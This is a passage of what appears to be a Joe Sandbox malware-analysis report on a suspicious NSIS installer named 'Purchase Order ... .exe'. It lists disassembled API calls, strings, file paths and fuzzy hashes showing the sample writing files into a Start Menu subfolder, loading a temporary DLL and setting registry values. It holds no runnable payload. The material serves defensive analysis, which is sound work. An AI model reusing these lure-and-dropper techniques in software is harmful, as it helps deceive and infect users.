                                              • Associated: 00000000.00000002.1989304530.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1989304530.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1989304530.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1989304530.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1989304530.0000000000456000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1989304530.0000000000460000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1989423102.0000000000463000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                              • String ID: "C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                              • API String ID: 606308-1554270348
                                              • Opcode ID: 10a6a98043c72b95613d0452641e3dda201b8ff11259fa49b57e5ba6e55a18f5
                                              • Instruction ID: 064cc6771aa4ec85c149aa806f0e8f7fc9ed350ba8b4bb786133750ec3f232c3
                                              • Opcode Fuzzy Hash: 10a6a98043c72b95613d0452641e3dda201b8ff11259fa49b57e5ba6e55a18f5
                                              • Instruction Fuzzy Hash: 9061A7312007007ED720AF669D46E2B3A6CEB85B4AF40157FF945B51E2CBBDA941CB2D

                                              Control-flow Graph (starting block 402edd-402f2b)
                                              APIs
                                              • GetTickCount.KERNEL32 ref: 00402EEE
                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe,?,?,00000006,?,0000000A), ref: 00402F0A
                                                • Part of subcall function 00405DB0: GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe,80000000,00000003,?,00000006,?,0000000A), ref: 00405DB4
                                                • Part of subcall function 00405DB0: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,?,0000000A), ref: 00405DD6
                                              • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe,C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe,80000000,00000003,?,00000006,?,0000000A), ref: 00402F56
                                              Strings
                                              • Inst, xrefs: 00402FC2
                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00402EE7
                                              • Null, xrefs: 00402FD4
                                              • "C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe", xrefs: 00402EDD
                                              • Error launching installer, xrefs: 00402F2D
                                              • soft, xrefs: 00402FCB
                                              • C:\Users\user\Desktop, xrefs: 00402F38, 00402F3D, 00402F43
                                              • C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe, xrefs: 00402EF4, 00402F03, 00402F17, 00402F37
                                              • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004030B5
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1989260739.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1989289613.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1989304530.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1989304530.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1989304530.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1989304530.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1989304530.0000000000456000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1989304530.0000000000460000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1989423102.0000000000463000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: File$AttributesCountCreateModuleNameSizeTick
                                              • String ID: "C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                              • API String ID: 4283519449-4235797136
                                              • Opcode ID: 9da78bb69fdb731252d5033ab884fa182416324aee7ddcf9fc3f40609bcd7e9e
                                              • Instruction ID: dd9ea635540f9dffb1b2b479f8e1e5c18960c1b6140bd96a969558b27d112ec4
                                              • Opcode Fuzzy Hash: 9da78bb69fdb731252d5033ab884fa182416324aee7ddcf9fc3f40609bcd7e9e
                                              • Instruction Fuzzy Hash: C151F471901205ABDB20AF60DD85B9F7FA8FB0431AF15403BF910B62D5C7789E408BAD

                                              Control-flow Graph (starting block 4062dc-4062e7)
                                              APIs
                                              • GetSystemDirectoryW.KERNEL32(Call,?), ref: 0040641D
                                              • GetWindowsDirectoryW.KERNEL32(Call,?,00000000,0042C228,?,00405359,0042C228,00000000), ref: 00406430
                                              • SHGetSpecialFolderLocation.SHELL32(00405359,0041D800,00000000,0042C228,?,00405359,0042C228,00000000), ref: 0040646C
                                              • SHGetPathFromIDListW.SHELL32(0041D800,Call), ref: 0040647A
                                              • CoTaskMemFree.OLE32(0041D800), ref: 00406485
                                              • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004064AB
                                              • lstrlenW.KERNEL32(Call,00000000,0042C228,?,00405359,0042C228,00000000), ref: 00406503
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1989260739.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1989289613.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1989304530.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1989304530.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1989304530.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1989304530.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1989304530.0000000000456000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1989304530.0000000000460000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1989423102.0000000000463000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                              • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                              • API String ID: 717251189-1230650788
                                              • Opcode ID: fa0a2b683e095286a2d5fbab2c7d000eed8338a12233a5ea9fb98a8af75b8457
                                              • Instruction ID: 9562dd14d952d55a61127842092d6448be61ccc4685f782e3002b21b8a961bfb
                                              • Opcode Fuzzy Hash: fa0a2b683e095286a2d5fbab2c7d000eed8338a12233a5ea9fb98a8af75b8457
                                              • Instruction Fuzzy Hash: 38611171A00111ABDF209F54DC41AAE37A9EF45318F26803FE943BA2D0D77D9AA1C79D

                                              Control-flow Graph (starting block 40176f-401794)
                                              APIs
                                              • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\Tidenderne\Klapperes,?,?,00000031), ref: 004017B0
                                              • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\Tidenderne\Klapperes,?,?,00000031), ref: 004017D5
                                                • Part of subcall function 004062BA: lstrcpynW.KERNEL32(?,?,?,00403460,00433EE0,NSIS Error,?,00000006,?,0000000A), ref: 004062C7
                                                • Part of subcall function 00405322: lstrlenW.KERNEL32(0042C228,00000000,0041D800,755723A0,?,?,?,?,?,?,?,?,?,0040327A,00000000,?), ref: 0040535A
                                                • Part of subcall function 00405322: lstrlenW.KERNEL32(0040327A,0042C228,00000000,0041D800,755723A0,?,?,?,?,?,?,?,?,?,0040327A,00000000), ref: 0040536A
                                                • Part of subcall function 00405322: lstrcatW.KERNEL32(0042C228,0040327A,0040327A,0042C228,00000000,0041D800,755723A0), ref: 0040537D
                                                • Part of subcall function 00405322: SetWindowTextW.USER32(0042C228,0042C228), ref: 0040538F
                                                • Part of subcall function 00405322: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004053B5
                                                • Part of subcall function 00405322: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053CF
                                                • Part of subcall function 00405322: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053DD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1989260739.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1989289613.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1989304530.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1989304530.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1989304530.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1989304530.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1989304530.0000000000456000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1989304530.0000000000460000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1989423102.0000000000463000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                              • String ID: C:\Users\user\AppData\Local\Temp\nsh5948.tmp$C:\Users\user\AppData\Local\Temp\nsh5948.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\Tidenderne\Klapperes$Call

                                              Control-flow Graph (first block: 403116-40312d)
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: CountTick$wsprintf
                                              • String ID: ... %d%%$@

                                              Control-flow Graph (first block: 406624-406644)
                                              APIs
                                              • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040663B
                                              • wsprintfW.USER32 ref: 00406676
                                              • LoadLibraryExW.KERNEL32(?,00000000,?), ref: 0040668A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: DirectoryLibraryLoadSystemwsprintf
                                              • String ID: %s%S.dll$UXTHEME$\

                                              Control-flow Graph (first block: 4057f1-40583c)
                                              APIs
                                              • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405834
                                              • GetLastError.KERNEL32 ref: 00405848
                                              • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040585D
                                              • GetLastError.KERNEL32 ref: 00405867
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: ErrorLast$CreateDirectoryFileSecurity
                                              • String ID: C:\Users\user\Desktop

                                              Control-flow Graph (first block: 405ddf-405deb)
                                              APIs
                                              • GetTickCount.KERNEL32 ref: 00405DFD
                                              • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe",0040338D,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75573420,004035D9), ref: 00405E18
                                              Strings
                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405DE4, 00405DE8
                                              • "C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe", xrefs: 00405DDF
                                              • nsa, xrefs: 00405DEC
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: CountFileNameTempTick
                                              • String ID: "C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe"$C:\Users\user\AppData\Local\Temp\$nsa

                                              Control-flow Graph (first block: 7012177b-701217ba)
                                              APIs
                                                • Part of subcall function 70121B63: GlobalFree.KERNEL32(?), ref: 70121DB6
                                                • Part of subcall function 70121B63: GlobalFree.KERNEL32(?), ref: 70121DBB
                                                • Part of subcall function 70121B63: GlobalFree.KERNEL32(?), ref: 70121DC0
                                              • GlobalFree.KERNEL32(00000000), ref: 70121829
                                              • FreeLibrary.KERNEL32(?), ref: 701218AF
                                              • GlobalFree.KERNEL32(00000000), ref: 701218D4
                                                • Part of subcall function 70122356: GlobalAlloc.KERNEL32(?,?), ref: 70122387
                                                • Part of subcall function 70122728: GlobalAlloc.KERNEL32(?,00000000,?,?,00000000,?,?,?,701217FA,00000000), ref: 701227F8
                                                • Part of subcall function 701215C6: lstrcpyW.KERNEL32(?,70124020,00000000,701215C3,?,00000000,70121753,00000000), ref: 701215DC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2026022448.0000000070121000.00000020.00000001.01000000.00000004.sdmp, Offset: 70120000, based on PE: true
                                              • Associated: 00000000.00000002.2025997194.0000000070120000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000000.00000002.2026073766.0000000070123000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000000.00000002.2026100149.0000000070125000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_70120000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: Global$Free$Alloc$Librarylstrcpy
                                              • String ID:

                                              Control-flow Graph (first block: 4023e4-402415)
                                              APIs
                                              • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsh5948.tmp,00000023,00000011,00000002), ref: 0040242F
                                              • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsh5948.tmp,00000000,00000011,00000002), ref: 0040246F
                                              • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsh5948.tmp,00000000,00000011,00000002), ref: 00402557
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: CloseValuelstrlen
                                              • String ID: C:\Users\user\AppData\Local\Temp\nsh5948.tmp
                                              APIs
                                                • Part of subcall function 00405C3A: CharNextW.USER32(?,?,0042FA50,?,00405CAE,0042FA50,0042FA50,?,?,75573420,004059EC,?,C:\Users\user\AppData\Local\Temp\,75573420,00000000), ref: 00405C48
                                                • Part of subcall function 00405C3A: CharNextW.USER32(00000000), ref: 00405C4D
                                                • Part of subcall function 00405C3A: CharNextW.USER32(00000000), ref: 00405C65
                                              • GetFileAttributesW.KERNELBASE(?,?,00000000,?,00000000,?), ref: 0040161A
                                                • Part of subcall function 004057F1: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405834
                                              • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\Tidenderne\Klapperes,?,00000000,?), ref: 0040164D
                                              Strings
                                              • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\Tidenderne\Klapperes, xrefs: 00401640
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                              • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\Tidenderne\Klapperes
                                              • API String ID: 1892508949-2837566543
                                              APIs
                                              • IsWindowVisible.USER32(?), ref: 004052C5
                                              • CallWindowProcW.USER32(?,?,?,?), ref: 00405316
                                                • Part of subcall function 0040427D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040428F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: Window$CallMessageProcSendVisible
                                              • String ID:
                                              • API String ID: 3748168415-3916222277
                                              APIs
                                              • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000002,0042C228,00000000,?,?,Call,?,?,004063FC,80000002), ref: 004061CE
                                              • RegCloseKey.KERNELBASE(?,?,004063FC,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,0042C228), ref: 004061D9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: CloseQueryValue
                                              • String ID: Call
                                              • API String ID: 3356406503-1824292864
                                              APIs
                                              • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430250,Error launching installer), ref: 004058CC
                                              • CloseHandle.KERNEL32(?), ref: 004058D9
                                              Strings
                                              • Error launching installer, xrefs: 004058B6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: CloseCreateHandleProcess
                                              • String ID: Error launching installer
                                              • API String ID: 3712363035-66219284
                                              APIs
                                              • GetModuleHandleW.KERNELBASE(00000000,00000001,?), ref: 0040205D
                                                • Part of subcall function 00405322: lstrlenW.KERNEL32(0042C228,00000000,0041D800,755723A0,?,?,?,?,?,?,?,?,?,0040327A,00000000,?), ref: 0040535A
                                                • Part of subcall function 00405322: lstrlenW.KERNEL32(0040327A,0042C228,00000000,0041D800,755723A0,?,?,?,?,?,?,?,?,?,0040327A,00000000), ref: 0040536A
                                                • Part of subcall function 00405322: lstrcatW.KERNEL32(0042C228,0040327A,0040327A,0042C228,00000000,0041D800,755723A0), ref: 0040537D
                                                • Part of subcall function 00405322: SetWindowTextW.USER32(0042C228,0042C228), ref: 0040538F
                                                • Part of subcall function 00405322: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004053B5
                                                • Part of subcall function 00405322: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053CF
                                                • Part of subcall function 00405322: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053DD
                                              • LoadLibraryExW.KERNEL32(00000000,?,?,00000001,?), ref: 0040206E
                                              • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,?,00000001,?), ref: 004020EB
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                              • String ID:
                                              • API String ID: 334405425-0
                                              APIs
                                              • SetFilePointer.KERNELBASE(00000000), ref: 70122B33
                                              • GetLastError.KERNEL32 ref: 70122C3A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2026022448.0000000070121000.00000020.00000001.01000000.00000004.sdmp, Offset: 70120000, based on PE: true
                                              • Associated: 00000000.00000002.2025997194.0000000070120000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000000.00000002.2026073766.0000000070123000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000000.00000002.2026100149.0000000070125000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_70120000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: ErrorFileLastPointer
                                              • String ID:
                                              • API String ID: 2976181284-0
                                              APIs
                                              • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,?,?), ref: 004024B5
                                              • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsh5948.tmp,00000000,00000011,00000002), ref: 00402557
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: CloseQueryValue
                                              • String ID:
                                              • API String ID: 3356406503-0
                                              APIs
                                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                              • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID:
                                              • API String ID: 3850602802-0
                                              APIs
                                              • ShowWindow.USER32(00000000,00000000), ref: 00401E67
                                              • EnableWindow.USER32(00000000,00000000), ref: 00401E72
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: Window$EnableShow
                                              • String ID:
                                              • API String ID: 1136574915-0
                                              APIs
                                              • GetModuleHandleA.KERNEL32(?,?,?,00403401,0000000A), ref: 004066A6
                                              • GetProcAddress.KERNEL32(00000000,?), ref: 004066C1
                                                • Part of subcall function 00406624: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040663B
                                                • Part of subcall function 00406624: wsprintfW.USER32 ref: 00406676
                                                • Part of subcall function 00406624: LoadLibraryExW.KERNEL32(?,00000000,?), ref: 0040668A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                              • String ID:
                                              • API String ID: 2547128583-0
                                              APIs
                                              • GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe,80000000,00000003,?,00000006,?,0000000A), ref: 00405DB4
                                              • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,?,0000000A), ref: 00405DD6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: File$AttributesCreate
                                              • String ID:
                                              • API String ID: 415043291-0
                                              APIs
                                              • CreateDirectoryW.KERNELBASE(?,00000000,00403382,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75573420,004035D9,?,00000006,?,0000000A), ref: 00405874
                                              • GetLastError.KERNEL32(?,00000006,?,0000000A), ref: 00405882
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: CreateDirectoryErrorLast
                                              • String ID:
                                              • API String ID: 1375471231-0
                                              APIs
                                              • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 0040280D
                                                • Part of subcall function 00406201: wsprintfW.USER32 ref: 0040620E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: FilePointerwsprintf
                                              • String ID:
                                              • API String ID: 327478801-0
                                              APIs
                                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 00402343
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: PrivateProfileStringWrite
                                              • String ID:
                                              • API String ID: 390214022-0
                                              APIs
                                              • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CF2,00000000,?,?), ref: 0040617E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              APIs
                                              • SearchPathW.KERNELBASE(?,00000000,?,?,?,?,000000FF), ref: 00401749
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: PathSearch
                                              • String ID:
                                              • API String ID: 2203818243-0
                                              APIs
